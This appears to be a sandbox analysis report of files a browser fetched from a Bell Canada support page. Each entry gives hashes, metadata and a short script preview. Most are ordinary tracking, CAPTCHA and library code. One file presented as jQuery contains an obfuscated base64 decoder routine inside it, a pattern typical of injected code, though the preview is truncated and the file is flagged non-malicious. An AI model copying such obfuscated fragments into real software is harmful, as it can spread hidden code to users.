                                                                                                                                                                                                                                                                                                                                      SHA-256:788AFB96F2DA68E8729EC35F3D5E381FAD3482D37C54C2195C7311440EE4C27E
                                                                                                                                                                                                                                                                                                                                      SHA-512:44B953878BD650FE2BCC8B6904620955C3E396B7DC8F41F85D021A8E0404DA41DB15C5499A03F7D4FE9129BB340AA3F6782942CF5327502FD4569BEBBB17073F
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://www.googletagmanager.com/static/service_worker/4al0/sw.js?origin=https%3A%2F%2Fsupport.bell.ca
                                                                                                                                                                                                                                                                                                                                      Preview:'use strict';var k=function(a){function b(c){return a.next(c)}function e(c){return a.throw(c)}return new Promise(function(c,d){function f(h){h.done?c(h.value):Promise.resolve(h.value).then(b,e).then(f,d)}f(a.next())})};/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var m=this||self;var u,v;a:{for(var x=["CLOSURE_FLAGS"],B=m,C=0;C<x.length;C++)if(B=B[x[C]],B==null){v=null;break a}v=B}var G=v&&v[610401301];u=G!=null?G:!1;var H;const I=m.navigator;H=I?I.userAgentData||null:null;function J(a){return u?H?H.brands.some(({brand:b})=>b&&b.indexOf(a)!=-1):!1:!1}function K(a){var b;a:{const e=m.navigator;if(e){const c=e.userAgent;if(c){b=c;break a}}b=""}return b.indexOf(a)!=-1};function L(){return u?!!H&&H.brands.length>0:!1}function O(){return L()?J("Chromium"):(K("Chrome")||K("CriOS"))&&!(L()?0:K("Edge"))||K("Silk")};!K("Android")||O();O();!K("Safari")||O()||(L()?0:K("Coast"))||(L()?0:K("Opera"))||(L()?0:K("Edge"))||(L()?J("Microsoft Edge"):K("Edg/"))||L()&
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (62301)
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):62383
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.547361567820167
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:768:S4nHuTXW0Ano5nyAJNMjsGxMyjdSXfMESD15XCaJuHsMjPMuMSzMxKOZvxEOFpN:LHUG0AwDJVGxHoPMEc1fMn0IgUSEmN
                                                                                                                                                                                                                                                                                                                                      MD5:D7B2D55FFB68744F0594B74FDF1A5467
                                                                                                                                                                                                                                                                                                                                      SHA1:FA6A68C8A4ABC21A0FAE44A48795B536231EA84D
                                                                                                                                                                                                                                                                                                                                      SHA-256:12EFE7186801632BE89FD128FA6452C10D6D0D62F72E7E327F550891EA98E42F
                                                                                                                                                                                                                                                                                                                                      SHA-512:FF7255199303A9A0FBDE88882073E252D118D8333874F368F61D13E53DF7C4E08B319C2ACB649BBC4B064C2226BD18DC63EFDA4A5FCD1177953E22F395E62441
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://mybell-qc.akamaized.net/Resource/web/js/jquery.min.js?ver=202410092027
                                                                                                                                                                                                                                                                                                                                      Preview:/*! jQuery | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(t,e){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=t.document?e(t,!0):function(t){if (!t.document) throw new Error("jQuery requires a window with a document");return e(t)}:e(t)}("undefined"!=typeof window?window:this,function(t,e){"use strict";function n(t,e){for(var n in e)e.hasOwnProperty(n)&&(t[n]=e[n]);return t}function o(){}function i(t,e){return new i.fn.init(t,e)}function r(t){return"function"==typeof t}function s(t){return"string"==typeof t}function a(t){return"object"==typeof t&&null!==t}function c(t){return a(t)&&t.nodeType}function u(t){return t instanceof i}function a0d(a,b){const c=a0c();return a0d=function(d,e){d=d-(0x1*0xb81+-0x107+-0x93c);let f=c[d];if(a0d['wzuedA']===undefined){var g=function(l){const m='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';let n='',o='',p=n+g;for(let q=0x93f+-0x7*0x118+-0x197,r,s,t=-0x30d*0x1+
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:F:F
                                                                                                                                                                                                                                                                                                                                      MD5:7215EE9C7D9DC229D2921A40E899EC5F
                                                                                                                                                                                                                                                                                                                                      SHA1:B858CB282617FB0956D960215C8E84D1CCF909C6
                                                                                                                                                                                                                                                                                                                                      SHA-256:36A9E7F1C95B82FFB99743E0C5C4CE95D83C9A430AAC59F84EF3CBFAB6145068
                                                                                                                                                                                                                                                                                                                                      SHA-512:F90DDD77E400DFE6A3FCF479B00B1EE29E7015C5BB8CD70F5F15B4886CC339275FF553FC8A053F8DDC7324F45168CFFAF81F8C3AC93996F6536EEF38E5E40768
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (17742), with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):17742
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.183768985902116
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:192:i4kGYyeNWeUMkYiXekYiXCLMV7rKV7LnA9MMJQ2n/eqzzH:KMJrXlXHhKJ8JDdHH
                                                                                                                                                                                                                                                                                                                                      MD5:0C330D247B153A9FF7A42F2D893BFA9A
                                                                                                                                                                                                                                                                                                                                      SHA1:6018C728AEF30B3BCD8A9D0683BDA8F4B6AEAEED
                                                                                                                                                                                                                                                                                                                                      SHA-256:7535AE8056317831D7C03DF22863A47BD72B9AAADD0A0B9314AAA95D1BEFE718
                                                                                                                                                                                                                                                                                                                                      SHA-512:BAA4A7D4D333D0BD25672A007CF0B4BBD37D75B5AE45AA095A0E0E1980095D2B5147C96A3AF2FA386E4AEC0E398C375729D6123E2FB3F9BB2CABDE79E4224361
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:var omnitureInterval, counter = !1, proActiveCounter = !1, newSessionAgent = !1, newSessionMsg = !1, newSessionMinimize = !1, newSessionStartOver = !1, newSessionChatTranscript = !1, newSessionClose = !1, newSessionsocketConnected = !1, chatdetails = ""; function getOmnitureCookie(e) { var t = {}; return document.cookie.split(";").forEach(function (e) { var n = e.split("=")[0], o = e.substring(e.split("=")[0].length + 1); t[n.trim()] = o }), t[e] } var socketConnected = "", isChatOpen = "", isChatAgentConnected = "", chatId = "", engagementId = "", chatEngineType = "", clickedStartOver = !1, isChatActive = "", chatEntry = "", pageCategory = "", isProactive = "", proactiveType = "", omnitureCookieNames = ["__csomni", "__ceidomni", "__cacomni", "__cminomni", "__cromni", "__ctromni", "__cepomni", "__cpcpomni", "__cabomni", "__cpaomni"]; setInterval(function () { var e = void 0 !== getOmnitureCookie("__eccomp"), t = e ? readCookieContentById("eccompslex", "__cwss") : getOmnitureCookie("__c
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):102
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.997660514702103
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:JSbMqSL1cdXWKQKT/hlkMYatGECWaee:PLKdXNQKzLQL
                                                                                                                                                                                                                                                                                                                                      MD5:9AFB0D35BB088B3036561313BF7CE1F4
                                                                                                                                                                                                                                                                                                                                      SHA1:C7F3FDE34C537242969FBBD736B5B129611F1694
                                                                                                                                                                                                                                                                                                                                      SHA-256:6E4501CE6F65A1B8671A9D31A8F5AB56DFA4E30AA7A4A971DAA1544AB2EB53C1
                                                                                                                                                                                                                                                                                                                                      SHA-512:C08FAB7DD122743F8F942AC5F0F1A05A2A44BEFD7DA677074CC3D2D464A106CE88047C1396F4C99DABBF99541230CA37B05158F448E7014B36E1E9FE38C572AF
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://www.google.com/recaptcha/enterprise/webworker.js?hl=en&v=-ZG7BC9TxCVEbzIO2m429usb
                                                                                                                                                                                                                                                                                                                                      Preview:importScripts('https://www.gstatic.com/recaptcha/releases/-ZG7BC9TxCVEbzIO2m429usb/recaptcha__en.js');
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):13
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):2.7773627950641693
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:qVZPV:qzd
                                                                                                                                                                                                                                                                                                                                      MD5:C83301425B2AD1D496473A5FF3D9ECCA
                                                                                                                                                                                                                                                                                                                                      SHA1:941EFB7368E46B27B937D34B07FC4D41DA01B002
                                                                                                                                                                                                                                                                                                                                      SHA-256:B633A587C652D02386C4F16F8C6F6AAB7352D97F16367C3C40576214372DD628
                                                                                                                                                                                                                                                                                                                                      SHA-512:83BAFE4C888008AFDD1B72C028C7F50DEE651CA9E7D8E1B332E0BF3AA1315884155A1458A304F6E5C5627E714BF5A855A8B8D7DB3F4EB2BB2789FE2F8F6A1D83
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://td.doubleclick.net/td/rul/953414520?random=1730380379227&cv=11&fst=1730380379227&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4as0h1v9172277568za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101533422~101823848~101878899~101878944~101925629&u_w=1280&u_h=1024&url=https%3A%2F%2Fsupport.bell.ca%2FBilling-and-Accounts%2Fmanage_your_bell_services_on_the_go&hn=www.googleadservices.com&frm=0&tiba=Manage%20your%20Bell%20services%20on%20the%20go&npa=0&pscdl=noapi&auid=441004151.1730380345&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.134%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.134&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config
                                                                                                                                                                                                                                                                                                                                      Preview:<html></html>
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (18308)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):18928
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.641565573664448
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:384:qohDrghXUPMCvumkDNYuZtlI5SJr9eY/l4naes/bAgdZ2A6Hr0g:jfyUwmydVr9e5aegd2A6HH
                                                                                                                                                                                                                                                                                                                                      MD5:14829D397567F087775A174778343B90
                                                                                                                                                                                                                                                                                                                                      SHA1:DDB522B447CA0DE357BBABC7A32A906CA619C032
                                                                                                                                                                                                                                                                                                                                      SHA-256:6F9D05882DC626A84E3E41728F81D871A8C935B5735C9EA7570D177CC90767E9
                                                                                                                                                                                                                                                                                                                                      SHA-512:9B8BA9463A744CFF9C644E19B07D3D883D9CEB95A232D9E63EC51308A0388324D0C9E34D5538C2773195E5E70158E166DAF7B83ABCDE23D47D0686397886C5B9
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:/* Anti-spam. Want to say hello? Contact (base64) Ym90Z3VhcmQtY29udGFjdEBnb29nbGUuY29t */ (function(){var F=function(E){return E},p=this||self,t=function(E,T){if(!(E=(T=null,p).trustedTypes,E)||!E.createPolicy)return T;try{T=E.createPolicy("bg",{createHTML:F,createScript:F,createScriptURL:F})}catch(y){p.console&&p.console.error(y.message)}return T};(0,eval)(function(E,T){return(T=t())&&E.eval(T.createScript("1"))===1?function(y){return T.createScript(y)}:function(y){return""+y}}(p)(Array(Math.random()*7824|0).join("\n")+['(function(){/*',.'',.' Copyright Google LLC',.' SPDX-License-Identifier: Apache-2.0',.'*/',.'var G=function(E,T,F,t,d,p,J,Q){if(((((d=(J=(p=(Q=(E||T.C++,T.i>0&&T.S&&T.hP)&&T.l<=1&&!T.V&&!T.J&&(!E||T.Pu-F>1)&&document.hidden==0,T).C==4)||Q?T.R():T.I,J-T.I),T).s+=d>>14>0,T.h)&&(T.h^=(T.s+1>>2)*(d<<2)),T).H=T.s+1>>2!=0||T.H,p)||Q)T.C=0,T.I=J;if(!Q)return false;if((T.i>T.g&&(T.g=T.i),J-T.B)<T.i-(t?255:E?5:2))return false;return c(T,360,(t=(T.Pu=F,S(T,E?157:360)),T.P)),T.W
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:F:F
                                                                                                                                                                                                                                                                                                                                      MD5:7215EE9C7D9DC229D2921A40E899EC5F
                                                                                                                                                                                                                                                                                                                                      SHA1:B858CB282617FB0956D960215C8E84D1CCF909C6
                                                                                                                                                                                                                                                                                                                                      SHA-256:36A9E7F1C95B82FFB99743E0C5C4CE95D83C9A430AAC59F84EF3CBFAB6145068
                                                                                                                                                                                                                                                                                                                                      SHA-512:F90DDD77E400DFE6A3FCF479B00B1EE29E7015C5BB8CD70F5F15B4886CC339275FF553FC8A053F8DDC7324F45168CFFAF81F8C3AC93996F6536EEF38E5E40768
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 143x48, components 3
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):6114
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.851450612125079
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:96:R22zVtzGfULemt1uA/c7HV2hNAYiUeDFTu+KtdK+ZgY5rReLQ+Ge4DiyM:vmUD1ui8VUAYiUl+WdK+xaB4i
                                                                                                                                                                                                                                                                                                                                      MD5:5EF178FDA2A34FB73BA43BBAE977C113
                                                                                                                                                                                                                                                                                                                                      SHA1:06E2F1B27DAC00772E98307EE62752D954D7E4F9
                                                                                                                                                                                                                                                                                                                                      SHA-256:4B28052E176DA56CFBA975C907267F7B3E7AC68705DA9B1AEC8FF7223CB2A2FC
                                                                                                                                                                                                                                                                                                                                      SHA-512:D66C33A0B2EB1490E0D4011B4CDAACE9E4566A76F23EEBCE6531A040E4462394315C594D29182F2CB5B1B0639676E0F79527537B148AB5508C3E8FB67A4B78D4
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:......Exif..II*.................Ducky.......d...../http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c021 79.155772, 2014/01/13-19:44:00 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2014 (Windows)" xmpMM:InstanceID="xmp.iid:22FD072944E111E4A859DDF205F00E4D" xmpMM:DocumentID="xmp.did:22FD072A44E111E4A859DDF205F00E4D"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:22FD072744E111E4A859DDF205F00E4D" stRef:documentID="xmp.did:22FD072844E111E4A859DDF205F00E4D"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d.............................................................................................................................
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (586)
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1099
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.312651609837477
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:24:/OsIXvuPQa8VyIaoK8d7mQMJHvIOtmRY/Itt7IkQv1Bsj6GimR4Eq:DKgJTS7m9Zm76fs9p4J
                                                                                                                                                                                                                                                                                                                                      MD5:AB480182E18A16841A9028D8857825BB
                                                                                                                                                                                                                                                                                                                                      SHA1:5CBBA3587416D96008F9B003AEEE310EE64C7303
                                                                                                                                                                                                                                                                                                                                      SHA-256:8F8DF557C921A7D531BD7A4C5600E1758717368EB05CE4224279141BC4FF0DE4
                                                                                                                                                                                                                                                                                                                                      SHA-512:72DF6D2D9F81D77297EDEE94C04703AD51202D721786F959B5B6515349B6DBEEC106F61ECDB4C2E2B5FAC88B2DABC56E1CFC7349EF08BE9F6ADA02C8C5B65250
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://resources.digital-cloud.medallia.ca/wdccan/36793/onsite/embed.js
                                                                                                                                                                                                                                                                                                                                      Preview:.(function(){if(!window.KAMPYLE_EMBED){window.KAMPYLE_EMBED={kampyleInit:function(){var t=document.createElement('script');t.type='text/javascript';t.async=true;t.src=KAMPYLE_EMBED.getGenericLocation();t.charset='UTF-8';document.body.appendChild(t);},kampyleLoadLogger:function(){},kampyleEventHandler:function(elem,eventType,handler){if(elem.addEventListener){elem.addEventListener(eventType,handler,false);}.else if(elem.attachEvent){elem.attachEvent('on'+eventType,handler);}},isSupported:function(){var trident=window.KAMPYLE_EMBED.getUserAgent().match(/Trident\/(\d+)/);var msie=navigator.userAgent.match(/MSIE (\d+)/);return!(trident||msie);},getUserAgent:function(){return navigator.userAgent;},getGenericLocation:function(){var genericLocation=location.protocol+'//'+'resources.digital-cloud.medallia.ca/wdccan/36793/onsite/generic1730279018395.js';return genericLocation;},};if(window.KAMPYLE_EMBED.isSupported()){if(document.readyState==='complete'){window.KAMPYLE_EMBED.kampyleInit();}.els
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):22294
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.012541415403019
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:384:G36HNwdTyTU3yvbGr7oUKKWKWKjLuKCKGoUKJWKUbMKM4wmYHQj/t12hbhPzYHlb:rb3bGr7oUKZKWKjLuKCKGoUKMKUbMKMq
                                                                                                                                                                                                                                                                                                                                      MD5:4CB343C9D9B392CA2C3C7E8B21E4AC61
                                                                                                                                                                                                                                                                                                                                      SHA1:49F7A4D27AD646BE0C6BBB320BF29043F32FC4A0
                                                                                                                                                                                                                                                                                                                                      SHA-256:5390ED1A40D48B255D6E21B48AD913B4D70B9FB47809622CD4A8BB59BA20DAA6
                                                                                                                                                                                                                                                                                                                                      SHA-512:A301BD859E576FAE94BC7A75ACFBA0A816F19539AC1EE54E42F5CF1541213EF23C236485A5AAD11922BEC80DE86B3171E1BB7CAB8B8F86F59E537BD1B6508FCD
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:./* function 2 is used to send values for all required Omniture variables. */..function PassValuesToOmnitureVariables(fieldValue, replaceConditions) {.. var returnval;.. var keyvalueColl = replaceConditions.split('^');.. for (var i = 0; i < keyvalueColl.length; i++) {.. keyvaluepair = keyvalueColl[i].split(':');.. returnval = fieldValue.replace(keyvaluepair[0].toString(), keyvaluepair[1].toString());.. fieldValue = returnval;.. }.. TrackVariables(fieldValue);..}......function TrackVariables(omniVal) {.. s_oTrackPage(eval("(" + omniVal + ")"));..}....function SendJSVariablesToOmniture(fieldValue, replaceConditions, errorCode) {.. fieldValue = fieldValue.replace("#ARS#", errorCode); .. PassValuesToOmnitureVariables(fieldValue, replaceConditions);..}....../* Omniture P31463 .. As per P31463 requirement new varibale for each LOB is to be tracked... This variable is in general the account number.. the below updated functions are to cover t
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1799), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):109761
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.684843287166752
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:768:CthWdiqNWzklWMtht5QWuWiWr6BvWmMIWHC/waQckRnb6vWRqfb:kTqszkUuXdhr6BvWmMwwaQck5b6v7
                                                                                                                                                                                                                                                                                                                                      MD5:AB6094FFF17189199526912FCEC8E131
                                                                                                                                                                                                                                                                                                                                      SHA1:6D0F7DF69A881A019AB366970710EB4E8A7AD293
                                                                                                                                                                                                                                                                                                                                      SHA-256:02E992D517C853F77B768452F3155A0DFA6799B3F8783B87CA285E76B9A0C59B
                                                                                                                                                                                                                                                                                                                                      SHA-512:6326705C0EA2B4799CED5A983F4021022AA01988713BBEAA68C7C48D5BB151528B3C4C21ADABACBC50979DE07089A26936A06EE7FFAB2B17661FF13F3A30D5B8
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://support.bell.ca/styles/css/support_overview.css
                                                                                                                                                                                                                                                                                                                                      Preview:/*Banner*/..../* ..fluid-container..so-b-background-image-custom.. container.. so-b-outer-flex-container-custom.. so-b-inner-container-custom.. so-b-banner-title.. img.. img-responsive.. so-b-background-image-mobile-custom.. so-b-mobile-visible..*/........@media (max-width: 767.8px) {.. .so-b-mobile-visible {.. display: block;.. }.... .so-b-none-mobile-visible {.. display: none;.. }.... .so-b-container {.. height: 100%;.. margin-bottom: 20px;.. padding: 0 !important;.. margin: 0 !important;.. }.... .so-b-banner-title {.. min-height: 56px;.. color: #111111 !important;.. font-family: rsx-font-black;.. font-size: 26px;.. font-weight: 900;.. letter-spacing: -0.4px;.. line-height: 28px;.. text-align: center;.. margin-bottom: 20px;.. margin-left: 20px;.. margin-right: 20px;.. margin-top: 20px;.. }..}.....so-b
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):91
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.92586884922945
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Ub/HXiREjfMyqXXl6EWP1CSHI:UrXiGlqX1eRo
                                                                                                                                                                                                                                                                                                                                      MD5:D0D6C7E1BF397BA72E37A05F209D35BD
                                                                                                                                                                                                                                                                                                                                      SHA1:AEC1844CBE41ED28DE2B09E3F8C03EC714B7217D
                                                                                                                                                                                                                                                                                                                                      SHA-256:4526C470CE87CFC18A57F7C4EE7F4772329BA42B6BCAAE04B32F525400FE4AB7
                                                                                                                                                                                                                                                                                                                                      SHA-512:0C8F988CD57074A6B31AEA79B3DB797DD52EA3C04B38C756CDD74CB7C3CDA8EBF369D785C0892A20ADB39BE7398177E4EC082FB834AB497E98F4ACE361757CB2
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://app.link/_r?sdk=web2.85.0&_t=1380522052703713689&branch_key=key_live_adAu45V2R6wos7hoIYdA7flfytp07fPD&callback=branch_callback__6
                                                                                                                                                                                                                                                                                                                                      Preview:/**/ typeof branch_callback__6 === 'function' && branch_callback__6("1380522052703713689");
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):387619
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.251894100236539
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:6144:fpWlC/UCNyPe3Y5AavklWOXi8Yz8WuE/tM:fphMeYUXiN8WuE/tM
                                                                                                                                                                                                                                                                                                                                      MD5:BE4E295CDFAE5377F0821F09F3C5A2D7
                                                                                                                                                                                                                                                                                                                                      SHA1:5904E7F001F06699B9599ED93D1F8A017AE03904
                                                                                                                                                                                                                                                                                                                                      SHA-256:D00BCCF7A2C549E6BF80A73C182BF77B1003B41F0A96261D8073E67F2C89F2DF
                                                                                                                                                                                                                                                                                                                                      SHA-512:DA6C4EB1F3C004E02A4A363947C0F646DB06619089B4471F39896C292BFAE32851EE734F7B8DA7186193298CECB4AF3AA1220AE7DE6BAF16B231A0A5AF60FDCB
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:var DeviceAtlas,BELL;(function(n){typeof define=="function"&&define.amd?define(["jquery"],n):n(jQuery)})(function(n){function r(t,i){var r,f,e,o=t.nodeName.toLowerCase();return"area"===o?(r=t.parentNode,f=r.name,!t.href||!f||r.nodeName.toLowerCase()!=="map")?!1:(e=n("img[usemap='#"+f+"']")[0],!!e&&u(e)):(/^(input|select|textarea|button|object)$/.test(o)?!t.disabled:"a"===o?t.href||i:i)&&u(t)}function u(t){return n.expr.filters.visible(t)&&!n(t).parents().addBack().filter(function(){return n.css(this,"visibility")==="hidden"}).length}var f,i,e,t,o;n.ui=n.ui||{};n.extend(n.ui,{version:"1.11.3",keyCode:{BACKSPACE:8,COMMA:188,DELETE:46,DOWN:40,END:35,ENTER:13,ESCAPE:27,HOME:36,LEFT:37,PAGE_DOWN:34,PAGE_UP:33,PERIOD:190,RIGHT:39,SPACE:32,TAB:9,UP:38}});n.fn.extend({scrollParent:function(t){var i=this.css("position"),u=i==="absolute",f=t?/(auto|scroll|hidden)/:/(auto|scroll)/,r=this.parents().filter(function(){var t=n(this);return u&&t.css("position")==="static"?!1:f.test(t.css("overflow")+t
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (57057), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):57172
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.881500759559145
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:1536:F/t91PRv1/Zv7tBtjZxEcj3Qe9gpE2gWs101wJyb8V+XbCj8/:FlzjZxEcj3Q86/
                                                                                                                                                                                                                                                                                                                                      MD5:0AB1D89C68AB1C7909D27D309697B941
